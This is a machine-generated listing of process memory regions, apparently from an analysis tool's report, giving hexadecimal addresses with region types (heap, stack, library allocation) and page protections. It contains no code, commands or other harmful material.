trusted library allocation
page read and write
8DDE000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
1CB40000
heap
page read and write
2B24000
trusted library allocation
page read and write
313D000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
32D7000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
3060000
trusted library allocation
page read and write
7FF00240000
trusted library allocation
page execute and read and write
44D0000
trusted library allocation
page read and write
3AAE000
heap
page read and write
35A0000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page read and write
3AB1000
heap
page read and write
325000
heap
page read and write
418D000
trusted library allocation
page read and write
51ED000
heap
page read and write
307E000
stack
page read and write
2CC0000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
34AB000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
27B4000
trusted library allocation
page read and write
22F0000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
90DE000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
390000
trusted library allocation
page read and write
900E000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
10053000
unkown
page read and write
3141000
trusted library allocation
page read and write
1ACE0000
trusted library allocation
page read and write
4191000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
208000
heap
page read and write
3579000
trusted library allocation
page read and write
41B8000
trusted library allocation
page read and write
28ED000
stack
page read and write
351D000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
3ABA000
heap
page read and write
2FD0000
trusted library allocation
page read and write
8FE000
stack
page read and write
3ABA000
heap
page read and write
22E0000
heap
page read and write
130000
heap
page read and write
2B65000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
32BF000
stack
page read and write
1E0000
heap
page read and write
418D000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
12D91000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
272E000
stack
page read and write
B6000
stack
page read and write
687000
heap
page read and write
41C2000
trusted library allocation
page read and write
32DD000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
3E8000
heap
page read and write
2B58000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
3A19000
heap
page read and write
2FED000
trusted library allocation
page read and write
32E9000
trusted library allocation
page read and write
1AB000
stack
page read and write
376B000
trusted library allocation
page read and write
1B7B4000
heap
page read and write
44D8000
trusted library allocation
page read and write
51C4000
heap
page read and write
3572000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
6B8000
heap
page read and write
3D9000
heap
page read and write
2810000
trusted library allocation
page read and write
41BA000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
3A98000
heap
page read and write
2B65000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
2E34000
trusted library allocation
page read and write
27D3000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
2E0000
heap
page read and write
44D3000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
10057000
unkown
page read and write
2B60000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
2E70000
unkown
page read and write
1CA6E000
stack
page read and write
44D3000
trusted library allocation
page read and write
301E000
trusted library allocation
page read and write
401C000
stack
page read and write
3AB1000
heap
page read and write
23C3000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
286E000
stack
page read and write
2B4E000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
358D000
trusted library allocation
page read and write
27AD000
stack
page read and write
2B67000
trusted library allocation
page read and write
2FAE000
stack
page read and write
44E7000
trusted library allocation
page read and write
2720000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
3AA5000
heap
page read and write
2D60000
heap
page read and write
2F2E000
stack
page read and write
41C2000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
2F40000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
281F000
stack
page read and write
85EE000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
2CC9000
trusted library section
page readonly
2B67000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
1F65000
heap
page read and write
418D000
trusted library allocation
page read and write
2CE0000
trusted library allocation
page read and write
2AA1000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
7680000
heap
page read and write
44E7000
trusted library allocation
page read and write
2B24000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
2100000
trusted library allocation
page read and write
10000
heap
page read and write
2B67000
trusted library allocation
page read and write
3CB0000
trusted library allocation
page read and write
32DB000
trusted library allocation
page read and write
282F000
stack
page read and write
2F62000
trusted library allocation
page read and write
29F0000
heap
page read and write
23C0000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
B5000
stack
page read and write | page guard
3385000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
298F000
stack
page read and write
2B60000
trusted library allocation
page read and write
301B000
trusted library allocation
page read and write
937000
heap
page read and write
44DC000
trusted library allocation
page read and write
7FF001F0000
trusted library allocation
page execute and read and write
2B41000
trusted library allocation
page read and write
1F9B000
heap
page read and write
3AAB000
heap
page read and write
43D000
heap
page read and write
3A59000
heap
page read and write
1C45000
heap
page read and write
3F3000
heap
page read and write
2B65000
trusted library allocation
page read and write
305000
heap
page read and write
414B000
trusted library allocation
page read and write
6EA000
heap
page read and write
2B60000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
2E7000
heap
page read and write
3881000
trusted library allocation
page execute
1D0000
heap
page read and write
418D000
trusted library allocation
page read and write
3A45000
heap
page read and write
562D000
heap
page read and write
358B000
trusted library allocation
page read and write
3A06000
heap
page read and write
2810000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
2EF3000
trusted library allocation
page read and write
2AE000
heap
page read and write
10000
heap
page read and write
2B4E000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
3573000
trusted library allocation
page read and write
4B0000
trusted library allocation
page read and write
3562000
trusted library allocation
page read and write
387C000
stack
page read and write
3A5A000
heap
page read and write
3A8E000
heap
page read and write
2810000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
3A8A000
heap
page read and write
44DC000
trusted library allocation
page read and write
930000
heap
page read and write
2B67000
trusted library allocation
page read and write
2B14000
trusted library allocation
page read and write
170000
heap
page read and write
1C40000
heap
page read and write
831E000
trusted library allocation
page read and write
2A88000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
32D6000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
3A32000
trusted library allocation
page read and write
3ABA000
heap
page read and write
2B58000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
44D3000
trusted library allocation
page read and write
2CCF000
trusted library section
page readonly
44D3000
trusted library allocation
page read and write
2820000
trusted library allocation
page read and write
930000
heap
page read and write
954000
heap
page read and write
44E7000
trusted library allocation
page read and write
1D07000
heap
page read and write
4198000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
3768000
trusted library allocation
page read and write
3D4000
heap
page read and write
45F000
heap
page read and write
B40000
heap
page read and write
3B6000
heap
page read and write
325000
heap
page read and write
3AAE000
heap
page read and write
44D0000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
3385000
trusted library allocation
page read and write
2870000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
32D5000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
39CC000
stack
page read and write
2F7E000
stack
page read and write
3A9D000
heap
page read and write
1B960000
trusted library allocation
page read and write
32E4000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
3134000
trusted library allocation
page read and write
377F000
trusted library allocation
page read and write
10046000
unkown
page readonly
351D000
trusted library allocation
page read and write
358B000
trusted library allocation
page read and write
1BDEE000
stack
page read and write
2B67000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
2A2A000
heap
page execute and read and write
2232000
heap
page read and write
23A0000
trusted library allocation
page read and write
23F0000
trusted library allocation
page read and write
3F4000
heap
page read and write
610000
heap
page read and write
3AC9000
heap
page read and write
32DD000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
2F0000
heap
page read and write
3A8000
heap
page read and write
2B67000
trusted library allocation
page read and write
3CAA000
stack
page read and write
7FF001B0000
trusted library allocation
page execute and read and write
2810000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
294F000
stack
page read and write
3AC9000
heap
page read and write
3CD6000
trusted library allocation
page read and write
150000
heap
page read and write
44D8000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
A30000
heap
page read and write
2B65000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
31F0000
trusted library allocation
page read and write
3AB1000
heap
page read and write
374E000
trusted library allocation
page read and write
3884000
trusted library allocation
page execute
937000
heap
page read and write
377D000
trusted library allocation
page read and write
2C81000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
3A39000
heap
page read and write
10057000
unkown
page read and write
44DC000
trusted library allocation
page read and write
3CD4000
trusted library allocation
page read and write
32EC000
trusted library allocation
page read and write
3300000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
3883000
trusted library allocation
page execute
41B8000
trusted library allocation
page read and write
3A5D000
heap
page read and write
2B24000
trusted library allocation
page read and write
223F000
stack
page read and write
29F4000
heap
page read and write
44D8000
trusted library allocation
page read and write
7FF00100000
trusted library allocation
page read and write
900000
heap
page read and write
7FF001D0000
trusted library allocation
page execute and read and write
2EC2000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
3A23000
heap
page read and write
2B65000
trusted library allocation
page read and write
3180000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
2EE1000
trusted library allocation
page read and write
563F000
heap
page read and write
414B000
trusted library allocation
page read and write
370000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
3A86000
heap
page read and write
377B000
trusted library allocation
page read and write
3180000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page read and write
4194000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
325000
heap
page read and write
2B60000
trusted library allocation
page read and write
3ABA000
heap
page read and write
30B0000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
357C000
trusted library allocation
page read and write
398000
heap
page read and write
41B8000
trusted library allocation
page read and write
2F08000
trusted library allocation
page read and write
394000
trusted library allocation
page read and write
2820000
trusted library allocation
page read and write
31A4000
trusted library allocation
page read and write
2F2000
heap
page read and write
3B6000
heap
page read and write
1E70000
trusted library allocation
page read and write
3A62000
heap
page read and write
10000
heap
page read and write
3AA7000
heap
page read and write
3A37000
heap
page read and write
2904000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
23D4000
heap
page read and write
418D000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
3F4000
heap
page read and write
3E9000
heap
page read and write
2AA0000
heap
page read and write
2B60000
trusted library allocation
page read and write
267000
heap
page read and write
2B58000
trusted library allocation
page read and write
9E2000
heap
page read and write
2B65000
trusted library allocation
page read and write
23C4000
trusted library allocation
page read and write
3AC9000
heap
page read and write
35A000
heap
page read and write
2B65000
trusted library allocation
page read and write
1B66000
heap
page read and write
8FBE000
trusted library allocation
page read and write
3385000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
2680000
heap
page read and write
44D0000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
51C3000
heap
page read and write
32E0000
trusted library allocation
page read and write
241D000
stack
page read and write
2E0000
heap
page read and write
3A90000
heap
page read and write
2B4E000
trusted library allocation
page read and write
3BD000
heap
page read and write
2313000
trusted library allocation
page read and write
1005A000
unkown
page readonly
351D000
trusted library allocation
page read and write
2F4E000
stack
page read and write
3520000
trusted library allocation
page execute
352000
heap
page read and write
2ED0000
trusted library allocation
page read and write
104000
heap
page read and write
3A9D000
heap
page read and write
2B60000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
1B97A000
trusted library allocation
page read and write
2F8F000
trusted library allocation
page read and write
2E80000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
3133000
trusted library allocation
page read and write
7FF002A0000
trusted library allocation
page execute and read and write
20000
heap
page read and write
347000
heap
page read and write
877E000
trusted library allocation
page read and write
562D000
heap
page read and write
8D9E000
trusted library allocation
page read and write
3A32000
heap
page read and write
220E000
stack
page read and write
67A000
heap
page read and write
2A78000
trusted library allocation
page read and write
419C000
trusted library allocation
page read and write
43D000
heap
page read and write
3578000
trusted library allocation
page read and write
3A8E000
heap
page read and write
10046000
unkown
page readonly
2B60000
trusted library allocation
page read and write
51D4000
heap
page read and write
10000000
unkown
page readonly
2B60000
trusted library allocation
page read and write
10046000
unkown
page readonly
418D000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
3597000
trusted library allocation
page read and write
10046000
unkown
page readonly
26C000
stack
page read and write
358D000
trusted library allocation
page read and write
2FFB000
trusted library allocation
page read and write
1D04000
heap
page read and write
418D000
trusted library allocation
page read and write
32DE000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
3188000
trusted library allocation
page read and write
3A9D000
heap
page read and write
44D0000
trusted library allocation
page read and write
1005A000
unkown
page readonly
44D0000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
3577000
trusted library allocation
page read and write
32D9000
trusted library allocation
page read and write
2CC4000
trusted library section
page readonly
33BA000
trusted library allocation
page read and write
3816000
trusted library allocation
page read and write
3A9D000
heap
page read and write
831E000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
2AB9000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
268000
heap
page read and write
418D000
trusted library allocation
page read and write
358D000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
358B000
trusted library allocation
page read and write
3576000
trusted library allocation
page read and write
2F2000
heap
page read and write
3763000
trusted library allocation
page read and write
2CC000
heap
page read and write
31EF000
stack
page read and write
374E000
trusted library allocation
page read and write
332F000
heap
page read and write
64D000
heap
page read and write
45D0000
heap
page read and write
305000
heap
page read and write
3A2F000
heap
page read and write
41A1000
trusted library allocation
page read and write
2B14000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
10053000
unkown
page read and write
44E7000
trusted library allocation
page read and write
1005A000
unkown
page readonly
317E000
stack
page read and write
44D3000
trusted library allocation
page read and write
3AA5000
heap
page read and write
32FE000
trusted library allocation
page read and write
3A5C000
heap
page read and write
890000
heap
page read and write
44D0000
trusted library allocation
page read and write
10053000
unkown
page read and write
2E80000
trusted library allocation
page read and write
300F000
trusted library allocation
page read and write
2F2000
heap
page read and write
210000
heap
page read and write
414B000
trusted library allocation
page read and write
3385000
trusted library allocation
page read and write
5209000
heap
page read and write
1D7000
heap
page read and write
3A34000
heap
page read and write
270000
trusted library allocation
page read and write
562B000
heap
page read and write
2F3E000
stack
page read and write
2FA7000
trusted library allocation
page read and write
3AC2000
heap
page read and write
3578000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
303E000
stack
page read and write
12CAC000
trusted library allocation
page read and write
2E33000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
3A2D000
heap
page read and write
3AAE000
heap
page read and write
3385000
trusted library allocation
page read and write
26F000
heap
page read and write
2E7000
heap
page read and write
2CC0000
trusted library section
page readonly
2B6000
heap
page read and write
351D000
trusted library allocation
page read and write
340000
heap
page read and write
2B41000
trusted library allocation
page read and write
6D0000
heap
page read and write
2B4E000
trusted library allocation
page read and write
2A92000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
3180000
trusted library allocation
page read and write
2D65000
heap
page read and write
2810000
trusted library allocation
page read and write
2CB5000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
2894000
trusted library allocation
page read and write
3ABA000
heap
page read and write
414B000
trusted library allocation
page read and write
51CC000
heap
page read and write
8FDE000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
31BB000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
3385000
trusted library allocation
page read and write
10057000
unkown
page read and write
87CE000
trusted library allocation
page read and write
2FAE000
trusted library allocation
page read and write
3A06000
heap
page read and write
3A9D000
heap
page read and write
330000
heap
page read and write
2B67000
trusted library allocation
page read and write
3A56000
heap
page read and write
357F000
trusted library allocation
page read and write
10000000
unkown
page readonly
2B58000
trusted library allocation
page read and write
3A2E000
heap
page read and write
3A7F000
heap
page read and write
352000
heap
page read and write
2810000
trusted library allocation
page read and write
352000
heap
page read and write
3AAB000
heap
page read and write
41B8000
trusted library allocation
page read and write
39F0000
heap
page read and write
3385000
trusted library allocation
page read and write
2A60000
heap
page execute and read and write
2B58000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
430000
heap
page read and write
2FDE000
stack
page read and write
358B000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
2FFF000
trusted library allocation
page read and write
340000
heap
page read and write
44D3000
trusted library allocation
page read and write
3AAC000
heap
page read and write
3B6000
heap
page read and write
393000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
5637000
heap
page read and write
32E1000
trusted library allocation
page read and write
1A0000
heap
page read and write
8C3E000
trusted library allocation
page read and write
302E000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
8FDE000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
7FF00290000
trusted library allocation
page execute and read and write
3A40000
heap
page read and write
30000
heap
page read and write
2790000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
87CE000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
45F000
heap
page read and write
28DF000
stack
page read and write
43D000
heap
page read and write
41CF000
trusted library allocation
page read and write
31BE000
trusted library allocation
page read and write
305A000
trusted library allocation
page read and write
3A99000
heap
page read and write
2214000
heap
page read and write
903E000
trusted library allocation
page read and write
358D000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
2EB0000
trusted library allocation
page read and write
29E0000
trusted library allocation
page read and write
3B3000
trusted library allocation
page read and write
2CC000
stack
page read and write
2B24000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
20D000
heap
page read and write
3568000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
5641000
heap
page read and write
2B58000
trusted library allocation
page read and write
32F0000
heap
page read and write
2810000
trusted library allocation
page read and write
3AAE000
heap
page read and write
2EEE000
trusted library allocation
page read and write
330000
heap
page read and write
3B4000
heap
page read and write
2F55000
trusted library allocation
page read and write
2A03000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
360000
heap
page read and write
237F000
stack
page read and write
2B60000
trusted library allocation
page read and write
35B0000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
358D000
trusted library allocation
page read and write
4195000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
3A7F000
heap
page read and write
44DC000
trusted library allocation
page read and write
2D9B000
heap
page read and write
3760000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
41BA000
trusted library allocation
page read and write
419F000
trusted library allocation
page read and write
10000000
unkown
page readonly
3A7F000
heap
page read and write
7FF00230000
trusted library allocation
page read and write
2E1000
heap
page read and write
7FF00170000
trusted library allocation
page read and write
51C6000
heap
page read and write
44D3000
trusted library allocation
page read and write
3A6A000
heap
page read and write
12ED0000
trusted library allocation
page read and write
2690000
trusted library allocation
page read and write
83AE000
trusted library allocation
page read and write
903E000
trusted library allocation
page read and write
27D4000
trusted library allocation
page read and write
419E000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
2BC000
stack
page read and write
3A86000
heap
page read and write
2B65000
trusted library allocation
page read and write
634000
heap
page read and write
7FF000F2000
trusted library allocation
page execute and read and write
3A8A000
heap
page read and write
377B000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
2450000
trusted library allocation
page read and write
3769000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
3561000
trusted library allocation
page read and write
35A0000
trusted library allocation
page read and write
10053000
unkown
page read and write
3761000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
3563000
trusted library allocation
page read and write
51C8000
heap
page read and write
443000
heap
page read and write
520E000
heap
page read and write
44D0000
trusted library allocation
page read and write
2870000
trusted library allocation
page read and write
2FB8000
trusted library allocation
page read and write
2FA3000
trusted library allocation
page read and write
993000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
2F5E000
trusted library allocation
page read and write
520D000
heap
page read and write
2B58000
trusted library allocation
page read and write
31B4000
trusted library allocation
page read and write
10046000
unkown
page readonly
44E7000
trusted library allocation
page read and write
3AB3000
heap
page read and write
2810000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
53C0000
trusted library allocation
page read and write
3A9D000
heap
page read and write
2B41000
trusted library allocation
page read and write
1BA8E000
stack
page read and write
260000
heap
page read and write
2B24000
trusted library allocation
page read and write
8CDE000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
3A08000
heap
page read and write
87CE000
trusted library allocation
page read and write
2CC000
heap
page read and write
44E7000
trusted library allocation
page read and write
1F0000
heap
page read and write
44D8000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
23B0000
heap
page read and write
2B24000
trusted library allocation
page read and write
3ABA000
heap
page read and write
3C0000
heap
page read and write
32D9000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
7EFA3000
unkown
page read and write
2810000
trusted library allocation
page read and write
7FF0003A000
trusted library allocation
page execute and read and write
414B000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
1B0000
heap
page read and write
2E0000
heap
page read and write
8C3E000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
22B0000
heap
page read and write
3AA9000
heap
page read and write
2B24000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
10000
heap
page read and write
4196000
trusted library allocation
page read and write
3CD0000
trusted library allocation
page read and write
1B30000
heap
page read and write
4193000
trusted library allocation
page read and write
305E000
stack
page read and write
51C0000
heap
page read and write
3A7F000
heap
page read and write
330000
heap
page read and write
3578000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
1B7E7000
heap
page read and write
3AAB000
heap
page read and write
51D5000
heap
page read and write
3762000
trusted library allocation
page read and write
830E000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
45F000
heap
page read and write
44E7000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
2314000
trusted library allocation
page read and write
41E0000
trusted library allocation
page read and write
2690000
trusted library allocation
page read and write
3E0000
heap
page read and write
7FF00040000
trusted library allocation
page read and write
3A2B000
heap
page read and write
2B60000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
4D3000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
53C0000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
2870000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
2E7000
heap
page read and write
2F98000
trusted library allocation
page read and write
24E000
heap
page read and write
38C000
heap
page read and write
2870000
trusted library allocation
page read and write
2A20000
heap
page execute and read and write
358D000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
3AA9000
heap
page read and write
413000
trusted library allocation
page read and write
3A9000
heap
page read and write
351D000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
4200000
trusted library allocation
page read and write
2E93000
unkown
page read and write
2B41000
trusted library allocation
page read and write
418000
heap
page read and write
3AAE000
heap
page read and write
2FBC000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
BA000
stack
page read and write
3AB1000
heap
page read and write
2EC9000
trusted library allocation
page read and write
3A98000
heap
page read and write
3764000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
3569000
trusted library allocation
page read and write
23A0000
heap
page read and write
3880000
trusted library allocation
page execute
51F8000
heap
page read and write
44D3000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
23F0000
trusted library allocation
page read and write
300000
trusted library allocation
page read and write
3E7000
heap
page read and write
3E3000
heap
page read and write
2F6B000
trusted library allocation
page read and write
7FF00180000
trusted library allocation
page execute and read and write
3ABA000
heap
page read and write
2B67000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
8F3E000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2EEB000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
2F95000
trusted library allocation
page read and write
3AA9000
heap
page read and write
1B7AC000
heap
page read and write
3AAB000
heap
page read and write
3DF000
heap
page read and write
30AE000
stack
page read and write
374E000
trusted library allocation
page read and write
220000
trusted library allocation
page read and write
51EB000
heap
page read and write
414000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
10057000
unkown
page read and write
2B41000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
29B000
stack
page read and write
41CF000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
3A23000
heap
page read and write
3AC9000
heap
page read and write
2C7F000
stack
page read and write
96D000
heap
page read and write
51D4000
heap
page read and write
1005A000
unkown
page readonly
2AD6000
heap
page read and write
4199000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
3F4000
heap
page read and write
2B58000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
33C4000
trusted library allocation
page read and write
2F6F000
trusted library allocation
page read and write
2F7B000
trusted library allocation
page read and write
2B24000
trusted library allocation
page read and write
968000
heap
page read and write
617000
heap
page read and write
954000
heap
page read and write
3E4000
heap
page read and write
3E2000
heap
page read and write
3AA5000
heap
page read and write
414B000
trusted library allocation
page read and write
3A95000
heap
page read and write
44D8000
trusted library allocation
page read and write
3AC1000
heap
page read and write
44D8000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
2C7E000
stack
page read and write | page guard
3F0000
heap
page read and write
2870000
trusted library allocation
page read and write
20F0000
heap
page read and write
374E000
trusted library allocation
page read and write
24C000
stack
page read and write
8FBE000
trusted library allocation
page read and write
32D3000
trusted library allocation
page read and write
3E6000
heap
page read and write
3A39000
trusted library allocation
page read and write
3B2000
heap
page read and write
41CF000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
441000
heap
page read and write
2450000
heap
page read and write
348000
heap
page read and write
23C0000
trusted library allocation
page read and write
3564000
trusted library allocation
page read and write
325000
heap
page read and write
3385000
trusted library allocation
page read and write
41BA000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
3AC9000
heap
page read and write
3566000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
2F7F000
trusted library allocation
page read and write
32ED000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
1BC4E000
stack
page read and write
41B8000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
680000
trusted library allocation
page read and write
7FF00105000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
39D0000
heap
page read and write
1B970000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
2FC9000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
3A2C000
heap
page read and write
32DD000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
3560000
trusted library allocation
page read and write
32DD000
trusted library allocation
page read and write
7689000
heap
page read and write
314000
heap
page read and write
1EB000
stack
page read and write
7FF00210000
trusted library allocation
page read and write
562C000
heap
page read and write
358D000
trusted library allocation
page read and write
12F32000
trusted library allocation
page read and write
305000
heap
page read and write
32DA000
trusted library allocation
page read and write
3AA9000
heap
page read and write
35AD000
trusted library allocation
page read and write
377B000
trusted library allocation
